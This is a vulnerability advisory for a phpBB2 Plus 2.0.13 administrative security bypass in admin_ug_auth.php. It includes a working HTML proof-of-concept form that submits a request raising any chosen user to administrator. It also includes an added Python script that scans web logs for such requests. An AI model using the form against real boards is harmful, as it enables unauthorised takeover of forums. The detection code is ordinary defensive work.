PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability
BID:22730
Info
| Bugtraq ID: | 22730 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 26 2007 12:00AM |
| Updated: | Feb 26 2007 11:06PM |
| Credit: | Hasadya Raed is credited with discovering this issue. |
| Vulnerable: | phpBB2 phpBB2 Plus 2.0.13 |
| Not Vulnerable: | |
Discussion
PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.
Successful exploits may result in a complete compromise of vulnerable applications.
Exploit / POC
Attackers can exploit this issue via a browser.
The following exploit POST request is available:
<html>
<head>
</head>
<body>
<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
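With no vendor patch listed, requests of the kind shown in the proof of concept can be watched for in web server logs. The following is an added example, not part of the original advisory: it flags POSTs to admin_ug_auth.php whose Referer is missing or off-site, assuming Apache combined log format. The host name forum.example.com and the log lines are constructed, and the Referer test is a heuristic, not a definitive indicator.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" log format (assumed; adjust for your server).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
TARGET_SCRIPT = "/admin/admin_ug_auth.php"  # script named in the advisory


def suspicious_posts(lines, board_host):
    """Return (ip, timestamp, status, reason) for POSTs to admin_ug_auth.php
    whose Referer is absent or does not point at the board's own host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare only the path so query strings (e.g. a session id) are ignored.
        if not urlsplit(m["target"]).path.lower().endswith(TARGET_SCRIPT):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no referer"
        else:
            ref_host = (urlsplit(referer).hostname or "").lower()
            if ref_host == board_host.lower():
                continue  # form was submitted from the board's own pages
            reason = f"off-site referer ({ref_host or 'no host'})"
        # Status is kept so a responder can see whether the request succeeded.
        hits.append((m["ip"], m["ts"], int(m["status"]), reason))
    return hits


# Constructed sample log lines (documentation IP ranges, hypothetical hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2007:10:01:00 +0000] "POST /board/admin/admin_ug_auth.php?sid=abc HTTP/1.1" 200 5120 "http://forum.example.com/board/admin/admin_ug_auth.php?mode=user" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Feb/2007:10:02:11 +0000] "POST /board/admin/admin_ug_auth.php HTTP/1.1" 200 4801 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Feb/2007:10:03:42 +0000] "POST /board/admin/admin_ug_auth.php HTTP/1.1" 200 4801 "http://other.example.net/form.html" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Feb/2007:10:04:00 +0000] "GET /board/admin/admin_ug_auth.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Feb/2007:10:05:00 +0000] "POST /board/posting.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG, "forum.example.com"):
        print(hit)
```

Any flagged entry with a 2xx status is worth correlating with changes to user levels in the board's user table around the same timestamp.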
References
References:
- phpBB Homepage (phpBB Group)